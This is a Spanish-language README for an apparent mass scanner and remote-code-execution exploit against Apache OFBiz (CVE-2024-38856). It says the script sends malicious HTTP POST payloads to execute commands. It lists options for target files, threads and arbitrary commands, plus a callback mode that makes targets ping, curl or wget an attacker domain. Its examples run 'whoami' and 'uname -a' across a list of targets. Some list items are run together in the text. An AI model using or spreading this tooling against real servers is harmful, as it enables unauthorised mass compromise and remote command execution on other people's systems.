
Realice con el Escáner Masivo de Zero-Day y RCE de Apache OFBiz
Este script está diseñado para escanear la vulnerabilidad CVE-2024-38856 en aplicaciones Apache Ofbiz, lo que puede permitir la ejecución remota de código. Envía solicitudes HTTP POST a rutas específicas dentro de la aplicación Ofbiz con cargas maliciosas para explotar la vulnerabilidad.

coloredlogs para registros codificados por colores y fáciles de leerrequestscoloredlogscoloramaargparseurllib3Puede instalar las dependencias requeridas usando pip:
pip install requests coloredlogs colorama argparse urllib3
Para ejecutar el script, use el siguiente comando:
python script_name.py [options]
-t, --threads: Número de hilos a utilizar (por defecto: 1)-p, --port: Puerto de destino-c, --command: Comando a ejecutar-s, --scan: Realizar un escaneo con ping, curl y wget-d, --domain: Dominio (dominio del atacante) para escanear con ping, curl y wget-f, --file: Archivo que contiene una lista de objetivos en el formato http(s)://target,portEscanear objetivos con un comando:
python script_name.py -f targets.txt -c "whoami"
python script_name.py -s -d example.com -p 80
python script_name.py -f targets.txt -c "uname -a"